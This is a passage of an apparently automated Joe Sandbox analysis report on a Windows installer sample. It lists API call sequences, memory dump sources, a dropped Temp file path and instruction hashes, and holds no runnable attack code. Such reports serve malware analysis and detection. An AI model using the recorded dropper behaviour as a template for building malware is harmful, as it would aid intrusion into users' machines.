                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00403A5E,?), ref: 00403B1D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                                                                                                                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00405000
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                                                                                                                                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00405340
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                • String ID: $M$N
                                                                                                                                                                                                                                • API String ID: 2564846305-813528018
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404738
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040485A
                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404876
                                                                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\Stuffiness7.dat, xrefs: 00404835
                                                                                                                                                                                                                                • N, xrefs: 004047F4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$N
                                                                                                                                                                                                                                • API String ID: 3103080414-2890022275
                                                                                                                                                                                                                                • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                                                                                                                                • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                                                                                                                                • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,0042D268,00000000,?,?), ref: 00404AF1
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat), ref: 00404AFD
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                                                                                                                                                                                                                  • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharPrevW.USER32(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat
                                                                                                                                                                                                                                • API String ID: 2624150263-1276252447
                                                                                                                                                                                                                                • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                                                                                                                                                                • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                                                                                                                                                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                                                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00406202
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                                                • API String ID: 2171350718-461813615
                                                                                                                                                                                                                                • Opcode ID: 5499eb560c731fe365026282fea1d403a64bc5aecd0ea22a231c31d407be1798
                                                                                                                                                                                                                                • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5499eb560c731fe365026282fea1d403a64bc5aecd0ea22a231c31d407be1798
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000400), ref: 00406695
                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000400,00000000,0042C248,?,004055D6,0042C248,00000000,00000000,?,76F723A0), ref: 004066A8
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                • API String ID: 4260037668-2629116834
                                                                                                                                                                                                                                • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                                                                                                                                • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                                                                                                                • String ID: *B$ A$ A$... %d%%$}8@
                                                                                                                                                                                                                                • API String ID: 551687249-3029848762
                                                                                                                                                                                                                                • Opcode ID: 1f086596db69560882dd0e442cad73c65180189b4af0e4169c5b7a1c0c3cb60e
                                                                                                                                                                                                                                • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f086596db69560882dd0e442cad73c65180189b4af0e4169c5b7a1c0c3cb60e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000000,00000000,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat
                                                                                                                                                                                                                                • API String ID: 1941528284-456565144
                                                                                                                                                                                                                                • Opcode ID: 7071b985292706a63f1e4b2e85f49b16247090a83eb1416a6af2ac73d7dfe6a7
                                                                                                                                                                                                                                • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7071b985292706a63f1e4b2e85f49b16247090a83eb1416a6af2ac73d7dfe6a7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404586
                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004045B0
                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                                                                                                                                                                Memory Dump Source
